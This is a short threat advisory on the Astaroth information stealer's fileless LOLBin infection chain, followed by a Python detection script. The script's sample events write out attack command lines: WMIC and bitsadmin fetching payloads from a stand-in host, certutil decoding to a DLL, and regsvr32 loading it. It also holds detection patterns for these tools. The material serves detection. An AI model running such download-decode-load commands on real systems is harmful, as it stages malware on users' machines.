Astaroth is a trojan and information stealer that harvests sensitive data such as user credentials using a keylogger module, interception of operating system calls, and clipboard monitoring. It is used in a fileless malware campaign that runs in the memory of infected computers. Astaroth also abuses living-off-the-land binaries (LOLBins) such as the Windows Management Instrumentation Command-line (WMIC) utility to stealthily download and install malware payloads in the background.

The multi-stage infection process begins with a spear-phishing email containing a malicious link to an LNK file. When clicked, it downloads and executes JavaScript code, which in turn downloads the payload by abusing the Bitsadmin tool. The malicious payloads downloaded in the background are all Base64 encoded and are decoded on the system with the Certutil tool into four DLLs, which are then loaded with the Regsvr32 tool.
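The chain above is built entirely from signed Windows utilities, so each step looks benign on its own; what gives it away is the sequence on one host within a short window. The following detection logic is an added example (not code from the original article or from any vendor report): it takes process-creation records in a Sysmon-like shape, classifies the four LOLBin stages named above, and raises an alert when a host shows several of them within ten minutes. The event layout, the host names, the `example.invalid` URLs and the file paths are all constructed for this example.

```python
"""Added example: correlate LOLBin process-creation events into the staging
pattern described above (WMIC or Bitsadmin fetch -> Certutil Base64 decode ->
Regsvr32 DLL load).  Event shape and sample records are constructed, not real
telemetry."""
import re
from collections import defaultdict
from datetime import datetime, timedelta

# Constructed process-creation events (Sysmon Event ID 1-like fields).
SAMPLE_EVENTS = [
    {"host": "WS-01", "ts": "2024-01-10T09:00:05", "image": r"C:\Windows\System32\wbem\WMIC.exe",
     "cmd": 'WMIC.exe os get /format:"http://example.invalid/update.xsl"'},
    {"host": "WS-01", "ts": "2024-01-10T09:00:20", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer job1 /download /priority high http://example.invalid/p.b64 C:\Users\Public\p.txt"},
    {"host": "WS-01", "ts": "2024-01-10T09:01:10", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -decode C:\Users\Public\p.txt C:\Users\Public\p.dll"},
    {"host": "WS-01", "ts": "2024-01-10T09:01:30", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\Users\Public\p.dll"},
    # Benign look-alikes on other hosts: a hash check, a vendor COM registration, an admin transfer.
    {"host": "WS-02", "ts": "2024-01-10T10:15:00", "image": r"C:\Windows\System32\certutil.exe",
     "cmd": r"certutil -hashfile C:\Installers\setup.exe SHA256"},
    {"host": "WS-02", "ts": "2024-01-10T10:16:00", "image": r"C:\Windows\System32\regsvr32.exe",
     "cmd": r"regsvr32 /s C:\Program Files\Vendor\component.dll"},
    {"host": "WS-03", "ts": "2024-01-10T11:00:00", "image": r"C:\Windows\System32\bitsadmin.exe",
     "cmd": r"bitsadmin /transfer patch /download http://example.invalid/patch.msi C:\Temp\patch.msi"},
]

# Stage name -> (executable basename, regex that must match the command line).
STAGE_RULES = {
    "wmic_remote_fetch":  ("wmic.exe",      re.compile(r"https?://")),
    "bitsadmin_download": ("bitsadmin.exe", re.compile(r"/transfer|/addfile|/download")),
    "certutil_decode":    ("certutil.exe",  re.compile(r"[-/]decode\b")),
    "regsvr32_dll_load":  ("regsvr32.exe",  re.compile(r"\.dll\b")),
}


def classify(event):
    """Return the stage name an event matches, or None if it is not a stage."""
    basename = event["image"].rsplit("\\", 1)[-1].lower()
    cmd = event["cmd"].lower()
    for stage, (exe, pattern) in STAGE_RULES.items():
        if basename == exe and pattern.search(cmd):
            return stage
    return None


def assess(events, window=timedelta(minutes=10), min_stages=3):
    """Group stage hits per host and alert when >= min_stages distinct stages
    occur within `window` of each other.  Requiring several stages keeps a
    lone certutil or regsvr32 invocation from firing the alert."""
    by_host = defaultdict(list)
    for ev in events:
        stage = classify(ev)
        if stage:
            by_host[ev["host"]].append((datetime.fromisoformat(ev["ts"]), stage))

    alerts = []
    for host, hits in by_host.items():
        hits.sort()
        best = set()
        for i, (t0, _) in enumerate(hits):
            # Distinct stages seen in the window that opens at hit i.
            stages = {s for t, s in hits[i:] if t - t0 <= window}
            if len(stages) > len(best):
                best = stages
        if len(best) >= min_stages:
            alerts.append({"host": host, "stages": sorted(best)})
    return sorted(alerts, key=lambda a: a["host"])


if __name__ == "__main__":
    for alert in assess(SAMPLE_EVENTS):
        print(f"{alert['host']}: LOLBin staging chain, stages={alert['stages']}")
```

Run against the constructed events, only WS-01 is reported: it shows all four stages inside ninety seconds, while WS-02 and WS-03 each match at most one rule. In production the same logic should run over Sysmon Event ID 1 or EDR process telemetry, with the `min_stages` threshold and the window tuned to the environment's legitimate use of Bitsadmin and Certutil.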

Technical Details

  • BleepingComputer provides technical details and indicators of compromise on recent Astaroth activity, available here.